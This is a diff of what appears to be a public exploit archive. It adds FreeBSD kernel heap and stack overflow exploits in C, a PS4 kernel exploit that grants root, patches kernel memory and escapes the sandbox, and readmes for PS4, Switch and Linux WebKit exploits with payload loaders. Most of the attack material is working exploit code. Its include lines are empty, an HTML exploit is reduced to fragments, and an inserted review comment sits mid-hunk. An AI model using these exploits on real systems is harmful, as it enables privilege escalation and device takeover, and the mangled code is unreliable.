diff --git a/exploits/asp/webapps/44098.txt b/exploits/asp/webapps/44098.txt
index f5335c893..58c68d2f7 100644
--- a/exploits/asp/webapps/44098.txt
+++ b/exploits/asp/webapps/44098.txt
@@ -1,4 +1,4 @@
-# Exploit Title: Epic Systems Corporation MyChart SQL Injection
+# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
 # Google Dork: MyChart® licensed from Epic Systems Corporation
 # Date: 8/19/16
 # Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
@@ -10,7 +10,7 @@ Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
-The MyChart software uses Intersystems Caché for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic".
+The MyChart software contains an X-Path injection due to the lack of sanitization for the GE parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.
 EPIC was quick to respond to contact and patch the vulnerability in MyChart.
diff --git a/exploits/freebsd_x86-64/dos/44211.c b/exploits/freebsd_x86-64/dos/44211.c
new file mode 100644
index 000000000..7800fdffa
--- /dev/null
+++ b/exploits/freebsd_x86-64/dos/44211.c
@@ -0,0 +1,109 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int (*kprintf)(const char *fmt, ...);
+char *ostype;
+
+uint64_t originalRip;
+uint64_t originalRbp;
+
+void *resolve(char *name) {
+ struct kld_sym_lookup ksym;
+
+ ksym.version = sizeof(ksym);
+ ksym.symname = name;
+
+ if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+ perror("kldsym");
+ exit(1);
+ }
+
+ printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+ return (void *)ksym.symvalue;
+}
+
+void payload(void) {
+ kprintf(" [+] Entered kernel payload\n");
+
+ strcpy(ostype, "CTurt ");
+
+ __asm__ volatile("swapgs; sysret");
+}
+
+// Copy the stack onto the heap
+void heapOverflow(int index, size_t size) {
+ fkeyarg_t fkey;
+
+ fkey.keynum = index;
+ fkey.flen = size;
+ memset(&fkey.keydef, 0, 16);
+
+ ioctl(0, SETFKEY, &fkey);
+}
+
+// Copy the heap onto the stack
+void stackOverflow(int index) {
+ fkeyarg_t fkey;
+
+ fkey.keynum = index;
+ fkey.flen = 16;
+ memset(&fkey.keydef, 0, 16);
+
+ ioctl(0, GETFKEY, &fkey);
+}
+
+int main(void) {
+ int result, i;
+ fkeyarg_t fkey;
+
+ uint32_t ripLower4 = 0x808312cd; // jmp rbp
+ uint64_t rbp = (uint64_t)payload;
+
+
+ kprintf = resolve("printf");
+ ostype = resolve("ostype");
+
+
+ printf(" [+] Set full length for key 10\n");
+ fkey.keynum = 10;
+ fkey.flen = 16;
+ ioctl(0, SETFKEY, &fkey);
+
+
+ printf(" [+] Set bad length and perform heap overflow\n");
+ heapOverflow(0, 128 - offsetof(fkeyarg_t, keydef) + 8 + 0x30 + sizeof(ripLower4));
+
+
+ printf(" [+] Prepare stack overflow memory\n");
+ fkey.keynum = 10;
+ fkey.flen = 16;
+ ioctl(0, GETFKEY, &fkey);
+ originalRbp = *(uint64_t *)((char *)&fkey.keydef + 4);
+ originalRip = 0xffffffff00000000 | *(uint32_t *)((char *)&fkey.keydef + 12);
+
+ printf(" [+] Original rip: %#lx\n", originalRip);
+ printf(" [+] Original rbp: %#lx\n", originalRbp);
+
+ *(uint64_t *)((char *)&fkey.keydef + 4) = rbp;
+ *(uint32_t *)((char *)&fkey.keydef + 12) = ripLower4;
+ ioctl(0, SETFKEY, &fkey);
+
+
+ printf(" [+] Trigger stack overflow\n");
+ fflush(stdout);
+
+ stackOverflow(0);
+
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/freebsd_x86-64/dos/44212.c b/exploits/freebsd_x86-64/dos/44212.c
new file mode 100644
index 000000000..33cc74da6
--- /dev/null
+++ b/exploits/freebsd_x86-64/dos/44212.c
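Review bot: Every `#include` directive in this hunk has no header operand, so the file as shown would not even preprocess; the likely cause is that the `<...>` operands were dropped when the diff was rendered, so the stored files should be checked rather than the code edited. The same empty `#include` lines appear in the 44212.c and 44215.m hunks. In `main`, `int result, i;` declares two locals that are never used and can be removed.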
@@ -0,0 +1,159 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+void *(*ata_get_xport)(void);
+int (*kprintf)(const char *fmt, ...);
+char *ostype;
+
+void *resolve(char *name) {
+ struct kld_sym_lookup ksym;
+
+ ksym.version = sizeof(ksym);
+ ksym.symname = name;
+
+ if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+ perror("kldsym");
+ exit(1);
+ }
+
+ printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+ return (void *)ksym.symvalue;
+}
+
+void dummy(void) {
+}
+
+void payload(void) {
+ kprintf(" [+] Entered kernel payload\n");
+
+ strcpy(ostype, "CTurt ");
+}
+
+#define INFO_SIZE 0
+#define INFO_LIMIT 1
+#define INFO_USED 2
+#define INFO_FREE 3
+#define INFO_REQ 4
+#define INFO_FAIL 5
+
+int getZoneInfo(char *zname, int i) {
+ #define BUF_SIZE 256
+ #define LINE_SIZE 56
+
+ unsigned int info[6] = { 0 };
+ FILE *fp = NULL;
+ char buf[BUF_SIZE];
+ char iname[LINE_SIZE];
+
+ fp = popen("/usr/bin/vmstat -z", "r");
+
+ if(fp == NULL) {
+ perror("popen");
+ exit(1);
+ }
+
+ memset(buf, 0, sizeof(buf));
+ memset(iname, 0, sizeof(iname));
+
+ while(fgets(buf, sizeof(buf) - 1, fp) != NULL) {
+ sscanf(buf, "%s %u, %u, %u, %u, %u, %u\n", iname, &info[INFO_SIZE], &info[INFO_LIMIT],
+ &info[INFO_USED], &info[INFO_FREE], &info[INFO_REQ], &info[INFO_FAIL]);
+
+ if(strncmp(iname, zname, strlen(zname)) == 0 && iname[strlen(zname)] == ':') {
+ break;
+ }
+ }
+
+ pclose(fp);
+ return info[i];
+}
+
+void craftCorruptedZone(void *zone) {
+ void **uz_slab = (void **)(zone + 200);
+ void **uz_dtor = (void **)(zone + 216);
+ void **uz_fini = (void **)(zone + 232);
+ void **uz_import = (void **)(zone + 240);
+ void **uz_release = (void **)(zone + 248);
+ *uz_slab = dummy;
+ *uz_fini = payload;
+ *uz_import = dummy;
+ *uz_release = dummy;
+}
+
+void craftZone(void *zone) {
+ void **uz_slab = (void **)(zone + 200);
+ void **uz_dtor = (void **)(zone + 216);
+ void **uz_fini = (void **)(zone + 232);
+ void **uz_import = (void **)(zone + 240);
+ void **uz_release = (void **)(zone + 248);
+
+ // put valid kernel address
+ *uz_slab = ata_get_xport;
+ *uz_fini = ata_get_xport;
+ *uz_import = ata_get_xport;
+ *uz_release = ata_get_xport;
+}
+
+int main(void) {
+ int sock;
+ struct msghdr msg;
+
+ ata_get_xport = resolve("ata_get_xport");
+ kprintf = resolve("printf");
+ ostype = resolve("ostype");
+
+ const int previousAllocations = getZoneInfo("mbuf", INFO_USED);
+
+ const size_t bufferSize = getZoneInfo("mbuf", INFO_SIZE);
+ const size_t overflowSize = previousAllocations * bufferSize + 0x4000;
+
+ char *mapping, *buffer, *overflow;
+ const size_t copySize = bufferSize + overflowSize;
+ const size_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
+
+ mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+ munmap(mapping + mappingSize, PAGE_SIZE);
+
+ buffer = mapping + mappingSize - copySize;
+ overflow = buffer + bufferSize;
+
+ memset(overflow, 0, overflowSize);
+
+ // sizeof(struct uma_zone) == 0x300, but since we can't be certain exactly where we overflow from, we will craft at 256 byte intervals
+ for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
+ craftCorruptedZone(overflow + i);
+ }
+
+ sock = socket(AF_INET, SOCK_STREAM, 0);
+
+ memset(&msg, 0, sizeof(msg));
+ msg.msg_control = buffer;
+ msg.msg_controllen = -1;
+
+ printf(" [+] Performing overflow\n");
+ sendmsg(sock, &msg, 0);
+
+ printf(" [+] Triggering payload\n");
+ close(sock);
+
+ sock = socket(AF_INET, SOCK_STREAM, 0);
+
+ for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
+ craftZone(overflow + i);
+ }
+
+ printf(" [+] Performing overflow\n");
+ sendmsg(sock, &msg, 0);
+
+ munmap(mapping, mappingSize);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/hardware/dos/44197.md b/exploits/hardware/dos/44197.md
new file mode 100644
index 000000000..e72e6b53a
--- /dev/null
+++ b/exploits/hardware/dos/44197.md
@@ -0,0 +1,28 @@
+PS4 5.01 WebKit Exploit PoC
+===========================
+Based on:
+ - [CVE-2017-7005](https://bugs.chromium.org/p/project-zero/issues/detail?id=1208)
+ - [PegaSwitch](https://github.com/reswitched/pegaswitch) ([Copyright 2017 ReSwitched Team](https://github.com/reswitched/pegaswitch/blob/master/LICENSE.md))
+ - 4.0x exploit by [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
+
+
+> This exploit supports 5.01 (maybe others)!
+
+Installation
+============
+
+1. Install the latest version of node from [nodejs.org](https://nodejs.org)
+2. Clone this repository
+3. Run `npm install`
+
+Usage
+=====
+
+1. Run `npm start`
+
+License
+=======
+
+MIT License. See attached `LICENSE.md` file.
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44197.zip
\ No newline at end of file
diff --git a/exploits/bsd/local/43397.md b/exploits/hardware/local/43397.md
similarity index 100%
rename from exploits/bsd/local/43397.md
rename to exploits/hardware/local/43397.md
diff --git a/exploits/bsd/local/44177.c b/exploits/hardware/local/44177.c
similarity index 100%
rename from exploits/bsd/local/44177.c
rename to exploits/hardware/local/44177.c
diff --git a/exploits/hardware/local/44198.md b/exploits/hardware/local/44198.md
new file mode 100644
index 000000000..ec9cf9d8c
--- /dev/null
+++ b/exploits/hardware/local/44198.md
@@ -0,0 +1,29 @@
+PS4 4.0x Code Execution
+==============
+This repo is my edit of the [4.0x webkit exploit](http://rce.party/ps4/) released by [qwertyoruiopz](https://twitter.com/qwertyoruiopz). The edit re-organizes, comments, and adds portability across 3.50 - 4.07 (3.50, 3.55, 3.70, 4.00, and of course 4.06/4.07). The commenting and reorganization was mostly for my own learning experience, however hopefully others can find these comments helpful and build on them or even fix them if I've made mistakes. The exploit is much more stable than FireKaku and sets up the foundation for running basic ROP chains and returns to normal execution. Credit for the exploit goes completely to qwertyoruiopz.
+
+Organization
+==============
+Files in order by name alphabetically;
+* expl.js - Contains the heart of the exploit and establishes a read/write primitive.
+* gadgets.js - Contains gadget maps and function stub maps for a variety of firmwares. Which map is used is determined in the post-exploitation phase.
+* index.html - The main page for the exploit. Launches the exploit and contains post-exploitation stuff, as well as output and code execution.
+* rop.js - Contains the ROP framework modified from Qwerty's original exploit as well as the array in which module base addresses are held and gadget addresses are calculated.
+* syscalls.js - Contains a system call map for a variety of firmwares as well as a 'name -> number' map for syscall ID's.
+
+Usage
+==============
+Simply setup a web-server on localhost using xampp or any other program and setup these files in a directory. You can then go to your computer's local IPv4 address (found by running ipconfig in cmd.exe) and access the exploit.
+
+Notes
+==============
+* The exploit is pretty stable but will still sometimes crash. If the browser freezes simply back out and retry, if a segmentation fault (identified by prompt "You do not have enough free system memory") occurs, refresh the page before trying again as it seems to lead to better results.
+* This only allows code execution in ring3, to get ring0 execution a kernel exploit and KROP chain is needed.
+* If I've made an error (particularily having to do with firmware compatibility and gadgets) feel free to open an issue on the repo.
+* The exploit has been tested on 3.55 and 4.00, it is assumed to work on other firmwares listed but not guaranteed, again if you encounter a problem - open an issue on the repo.
+
+Credits
+==============
+qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/).
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44198.zip
\ No newline at end of file
diff --git a/exploits/hardware/local/44199.md b/exploits/hardware/local/44199.md
new file mode 100644
index 000000000..468d20a4b
--- /dev/null
+++ b/exploits/hardware/local/44199.md
@@ -0,0 +1,83 @@
+PS4 3.55 Unsigned Code Execution
+==============
+This GitHub Repository contains all the necessary tools for getting PoC Unsigned Code Execution on a Sony PS4 System with firmwares 3.15, 3.50 and 3.55.
+This Exploit, is based-off [Henkaku's](https://henkaku.xyz/) WebKit Vulnerability for the Sony's PSVita.
+It includes basic ROP and is able to return to normal execution.
+
+Pre-Requisites:
+==============
+1. A PC
+ 1. Running Windows, macOS or Linux
+ 2. A already set up basic server where the PS4 User's Guide launcher will point for loading the payload
+ 3. [Python](https://www.python.org/downloads/) 2.7.X
+ * Python 3.X gives problems, since they included major changes on the syntax and on the libraries in comparison with 2.7
+2. A Sony PlayStation 4
+ 1. Running the following firmwares:
+ * 3.15, 3.50 or 3.55
+3. Internet Connection (PS4 and PC directly wired to the Router is the mostly preferred option)
+
+Usage:
+==============
+There are two different methods to execute the Exploit, but first let's clarify how we will know which one to use.
+If your PlayStation 4 has got an already set-up PlayStation Network Account on it, you should use method 1.
+Else, if your PlayStation 4 -NEVER- had a PlayStation Network Account on it, you should use method 2.
+Probably you will ask why, it's pretty much easy to explain and understand:
+When you buy a PS4, comes unactivated, meaning that nobody has entered SEN Account on it. (Method 2)
+Once you use a SEN Account on it, the PS4 becomes an activated console. (Method 1)
+This doesn't affect the actual payload, but you should take in mind which method use.
+
+Method 1:
+==============
+Run this command on the folder you've downloaded this repo:
+`python server.py`
+All the debug options will be outputted during the Exploit process.
+Navigate to your PS4's Web Browser and simply type on the adress bar, your PC's IP Adress.
+Wait until the exploit finishes, once it does, PS4 will return to it's normal state.
+An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8).
+
+Method 2:
+==============
+A dns.conf file which is present on the source, needs to be edited accordingly your local PC's IP Adress.
+PlayStation 4's DNS Settings must be changed in order to point the PC's IP Adress where the Exploit is located.
+Once you've edited the dns.conf file, simply run the next command on the folder where you downloaded this repo:
+`python fakedns.py -c dns.conf`
+And then:
+`python server.py`
+All the debug options will be outputted during the Exploit process.
+Once Python part is done, get into your PlayStation 4, navigate to the User's Guide page and wait until exploit finishes out.
+An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8).
+
+Miscellaneous:
+==============
+If you want to try the socket test, change the IP Address located at the bottom of the ps4sploit.html file with your computer's one and run this command:
+`netcat -l 0.0.0.0 8989 -v`
+You should see something like:
+```
+Listening on [0.0.0.0] (family 0, port 8989)
+Connection from [192.168.1.72] port 8989 [tcp/sunwebadmins] accepted (family 2, sport 59389)
+Hello From a PS4!
+```
+Notes about this exploit:
+==============
+* Currently, the exploit does not work 100%, but is around 80% which is fine for our purposes.
+* Although it is confirmed to work, sometimes will fail, just wait some seconds and re-run the payload.
+* Performing too much memory allocation after sort() is called, can potentially lead to more instability and it may crash more.
+* The process will crash after the ROP payload is done executing.
+* This is only useful for researchers. There are many many more steps needed before this becomes useful to normal users.
+
+Acknowledgements
+================
+xyz - Much of the code is based off of his code used for the Henkaku project
+Anonymous contributor - WebKit Vulnerability PoC
+CTurt - I basically copied his JuSt-ROP idea
+xerpi - Used his idea for the socket code
+rck\`d - Finding bugs such as not allocating any space for a stack on function calls
+Maxton - 3.50 support and various cleanup
+Thunder07 - 3.15 support
+
+
+Contributing
+================
+The code currently is a bit of a mess, so if you have any improvements feel free to send a pull request or make an issue. Also I am perfectly fine if you want to fork and create your own project.
+
+Download:
\ No newline at end of file
diff --git a/exploits/hardware/local/44200.md b/exploits/hardware/local/44200.md
new file mode 100644
index 000000000..14f0f2919
--- /dev/null
+++ b/exploits/hardware/local/44200.md
@@ -0,0 +1,21 @@
+CVE 2014-1303 Proof Of Concept for PS4
+==============
+This repository contains a poc for the CVE 2014-1303 originally disclosed by Liang Chen. It has been tested to work on system firmware 2.03, but should work for systems on a firmware < 2.50, the ROP test will however only work on 2.03.
+
+Usage
+==============
+You need to edit the dns.conf to point to the ip address of your machine, and modify your consoles dns settings to point to it as well. Then run
+`python fakedns.py -c dns.conf`
+then
+`python server.py`
+Debug output will come from this process.
+
+Navigate to the User's Guide page on the PS4 and various information should be printed to the console. The ROP test will print what is stored in the rsp register. Continuing execution after rsp is pivoted still needs to be done.
+
+Acknowledgements
+================
+Liang Chen
+thexyz
+dreadlyei
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44200.zip
\ No newline at end of file
diff --git a/exploits/hardware/local/44206.c b/exploits/hardware/local/44206.c
new file mode 100644
index 000000000..5c0a271dd
--- /dev/null
+++ b/exploits/hardware/local/44206.c
@@ -0,0 +1,274 @@
+/*
+ Code written based on info available here http://cturt.github.io/dlclose-overflow.html
+
+ See attached LICENCE file
+ Thanks to CTurt and qwertyoruiop
+
+ - @kr105rlz
+
+Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
+*/
+
+#include "ps4.h"
+
+#define DEBUG_SOCKET
+#include "defines.h"
+
+static int sock;
+static void *dump;
+
+void payload(struct knote *kn) {
+ struct thread *td;
+ struct ucred *cred;
+
+ // Get td pointer
+ asm volatile("mov %0, %%gs:0" : "=r"(td));
+
+ // Enable UART output
+ uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;
+ *securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0
+
+ // Print test message to the UART line
+ printfkernel("\n\n\n\n\n\n\n\n\nHello from kernel :-)\n\n\n\n\n\n\n\n\n");
+
+ // Disable write protection
+ uint64_t cr0 = readCr0();
+ writeCr0(cr0 & ~X86_CR0_WP);
+
+ // sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
+ *(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
+ *(uint16_t *)0xFFFFFFFF82607826 = 0x9090;
+
+ *(char *)0xFFFFFFFF8332431A = 1;
+ *(char *)0xFFFFFFFF83324338 = 1;
+
+ // Restore write protection
+ writeCr0(cr0);
+
+ // Resolve creds
+ cred = td->td_proc->p_ucred;
+
+ // Escalate process to root
+ cred->cr_uid = 0;
+ cred->cr_ruid = 0;
+ cred->cr_rgid = 0;
+ cred->cr_groups[0] = 0;
+
+ void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
+
+ // sceSblACMgrIsSystemUcred
+ uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
+ *sonyCred = 0xffffffffffffffff;
+
+ // sceSblACMgrGetDeviceAccessType
+ uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
+ *sceProcType = 0x3801000000000013; // Max access
+
+ // sceSblACMgrHasSceProcessCapability
+ uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
+ *sceProcCap = 0xffffffffffffffff; // Sce Process
+
+ ((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true
+ ((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check
+
+ // Jailbreak ;)
+ cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0
+
+ // Break out of the sandbox
+ void *td_fdp = *(void **)(((char *)td->td_proc) + 72);
+ uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);
+ uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);
+ uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;
+ *td_fdp_fd_rdir = *rootvnode;
+ *td_fdp_fd_jdir = *rootvnode;
+}
+
+// Perform kernel allocation aligned to 0x800 bytes
+int kernelAllocation(size_t size, int fd) {
+ SceKernelEqueue queue = 0;
+ sceKernelCreateEqueue(&queue, "kexec");
+
+ sceKernelAddReadEvent(queue, fd, 0, NULL);
+
+ return queue;
+}
+
+void kernelFree(int allocation) {
+ close(allocation);
+}
+
+void *exploitThread(void *none) {
+ printfsocket("[+] Entered exploitThread\n");
+
+ uint64_t bufferSize = 0x8000;
+ uint64_t overflowSize = 0x8000;
+ uint64_t copySize = bufferSize + overflowSize;
+
+ // Round up to nearest multiple of PAGE_SIZE
+ uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
+
+ uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+ munmap(mapping + mappingSize, PAGE_SIZE);
+
+ uint8_t *buffer = mapping + mappingSize - copySize;
+
+ int64_t count = (0x100000000 + bufferSize) / 4;
+
+ // Create structures
+ struct knote kn;
+ struct filterops fo;
+ struct knote **overflow = (struct knote **)(buffer + bufferSize);
+ overflow[2] = &kn;
+ kn.kn_fop = &fo;
+
+ // Setup trampoline to gracefully return to the calling thread
+ void *trampw = NULL;
+ void *trampe = NULL;
+ int executableHandle;
+ int writableHandle;
+ uint8_t trampolinecode[] = {
+ 0x58, // pop rax
+ 0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919
+ 0x50, // push rax
+ 0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe
+ 0xFF, 0xE0 // jmp rax
+ };
+
+ // Get Jit memory
+ sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle);
+ sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle);
+
+ // Map r+w & r+e
+ trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0);
+ trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0);
+
+ // Copy trampoline to allocated address
+ memcpy(trampw, trampolinecode, sizeof(trampolinecode));
+ *(void **)(trampw + 14) = (void *)payload;
+
+ // Call trampoline when overflown
+ fo.f_detach = trampe;
+
+ // Start the exploit
+ int sockets[0x2000];
+ int allocation[50], m = 0, m2 = 0;
+ int fd = (bufferSize - 0x800) / 8;
+
+ printfsocket("[+] Creating %d sockets\n", fd);
+
+ // Create sockets
+ for(int i = 0; i < 0x2000; i++) {
+ sockets[i] = sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
+ if(sockets[i] >= fd) {
+ sockets[i + 1] = -1;
+ break;
+ }
+ }
+
+ // Spray the heap
+ for(int i = 0; i < 50; i++) {
+ allocation[i] = kernelAllocation(bufferSize, fd);
+ printfsocket("[+] allocation = %llp\n", allocation[i]);
+ }
+
+ // Create hole for the system call's allocation
+ m = kernelAllocation(bufferSize, fd);
+ m2 = kernelAllocation(bufferSize, fd);
+ kernelFree(m);
+
+ // Perform the overflow
+ int result = syscall(597, 1, mapping, &count);
+ printfsocket("[+] Result: %d\n", result);
+
+ // Execute the payload
+ printfsocket("[+] Freeing m2\n");
+ kernelFree(m2);
+
+ // Close sockets
+ for(int i = 0; i < 0x2000; i++) {
+ if(sockets[i] == -1)
+ break;
+ sceNetSocketClose(sockets[i]);
+ }
+
+ // Free allocations
+ for(int i = 0; i < 50; i++) {
+ kernelFree(allocation[i]);
+ }
+
+ // Free the mapping
+ munmap(mapping, mappingSize);
+
+ return NULL;
+}
+
+int _main(void) {
+ ScePthread thread;
+
+ initKernel();
+ initLibc();
+ initNetwork();
+ initJIT();
+ initPthread();
+
+#ifdef DEBUG_SOCKET
+ struct sockaddr_in server;
+
+ server.sin_len = sizeof(server);
+ server.sin_family = AF_INET;
+ server.sin_addr.s_addr = IP(192, 168, 0, 4);
+ server.sin_port = sceNetHtons(9023);
+ memset(server.sin_zero, 0, sizeof(server.sin_zero));
+ sock = sceNetSocket("debug", AF_INET, SOCK_STREAM, 0);
+ sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server));
+
+ int flag = 1;
+ sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));
+
+ dump = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+#endif
+
+ printfsocket("[+] Starting...\n");
+ printfsocket("[+] UID = %d\n", getuid());
+ printfsocket("[+] GID = %d\n", getgid());
+
+ // Create exploit thread
+ if(scePthreadCreate(&thread, NULL, exploitThread, NULL, "exploitThread") != 0) {
+ printfsocket("[-] pthread_create error\n");
+ return 0;
+ }
+
+ // Wait for thread to exit
+ scePthreadJoin(thread, NULL);
+
+ // At this point we should have root and jailbreak
+ if(getuid() != 0) {
+ printfsocket("[-] Kernel patch failed!\n");
+ sceNetSocketClose(sock);
+ return 1;
+ }
+
+ printfsocket("[+] Kernel patch success!\n");
+
+ // Enable debug menu
+ int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
+ RESOLVE(libKernelHandle, sysctlbyname);
+
+ uint32_t enable;
+ size_t size;
+
+ enable = 1;
+ size = sizeof(enable);
+
+ sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
+ sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
+
+#ifdef DEBUG_SOCKET
+ munmap(dump, PAGE_SIZE);
+#endif
+
+ printfsocket("[+] bye\n");
+ sceNetSocketClose(sock);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/hardware/local/44213.html b/exploits/hardware/local/44213.html
new file mode 100644
index 000000000..ebec11b68
--- /dev/null
+++ b/exploits/hardware/local/44213.html
@@ -0,0 +1,218 @@
+ + + + CVE-2016-4657 Switch PoC + + + +

CVE-2016-4657 Nintendo Switch PoC

+ +
waiting... click go.
+ + + + +
\ No newline at end of file
diff --git a/exploits/hardware/remote/44196.md b/exploits/hardware/remote/44196.md
new file mode 100644
index 000000000..5070416a6
--- /dev/null
+++ b/exploits/hardware/remote/44196.md
@@ -0,0 +1,26 @@
+# PS4 4.55 Kernel Exploit
+---
+## Summary
+In this project you will find a full implementation of the "bpf" kernel exploit for the PlayStation 4 on 4.55. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
+
+This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/455/).
+
+## Patches Included
+The following patches are made by default in the kernel ROP chain:
+1) Disable kernel write protection
+2) Allow RWX (read-write-execute) memory mapping
+3) Syscall instruction allowed anywhere
+4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
+5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
+
+## Notes
+- Early stages, so no payloads yet, I may provide a debug menu payload later on in the day.
+
+## Contributors
+Massive credits to the following:
+
+- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
+- [Flatz](https://twitter.com/flat_z)
+- Anonymous
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196.zip
\ No newline at end of file
diff --git a/exploits/hardware/remote/4522.html b/exploits/ios/remote/4522.html
similarity index 100%
rename from exploits/hardware/remote/4522.html
rename to exploits/ios/remote/4522.html
diff --git a/exploits/linux/local/44204.md b/exploits/linux/local/44204.md
new file mode 100644
index 000000000..f320bdbb2
--- /dev/null
+++ b/exploits/linux/local/44204.md
@@ -0,0 +1,44 @@
+# CVE-2014-1303 PoC for Linux
+CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux.
+This repository demonstrates the WebKit heap based buffer overflow vulnerability (CVE-2014-1303) on **Linux**.
+
+**NOTE:** Original exploit is written for Mac OS X and PS4 (PlayStation4).
+
+I've ported and tested work on Ubuntu 14.04, [WebKitGTK 2.1.2](https://webkitgtk.org/releases/)
+
+## Usage
+Firstly you need to run simple web server,
+```
+$ python server.py
+```
+then
+```
+$ cd /path/to/webkitgtk2.1.2/
+$ ./Programs/GtkLauncher http://localhost
+```
+You can run several tests like,
+- Crash ROP (Jump to invalid address like 0xdeadbeefdeadbeef)
+- Get PID (Get current PID)
+- Code Execution (Load and execute payload from outer network)
+- File System Dump (Dump "/dev" entries)
+
+## Description
+**exploit.html** ..... trigger vulnerability and jump to ROP chain
+**scripts/roputil.js** ..... utilities for ROP building
+**scripts/syscall.js** ..... syscall ROP chains
+**scripts/code.js** ..... hard coded remote loader
+**loader/** ..... simple remote loader (written in C)
+**loader/bin2js** ..... convert binary to js variables (for loader)
+
+## Purpose
+I've created this WebKit PoC for education in my course.
+I couldn't, of course, use actual PS4 console in my lecture for legal reason :(
+
+## Reference
+CVE 2014-1303 Proof Of Concept for PS4
+(https://github.com/Fire30/PS4-2014-1303-POC)
+Liang Chen, WEBKIT EVERYWHERE: SECURE OR NOT? [BHEU14]
+(https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF)
+
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44204.zip
\ No newline at end of file
diff --git a/exploits/linux/local/44205.md b/exploits/linux/local/44205.md
new file mode 100644
index 000000000..d62870892
--- /dev/null
+++ b/exploits/linux/local/44205.md
@@ -0,0 +1,16 @@
+# CVE-2014-9322 PoC for Linux kernel
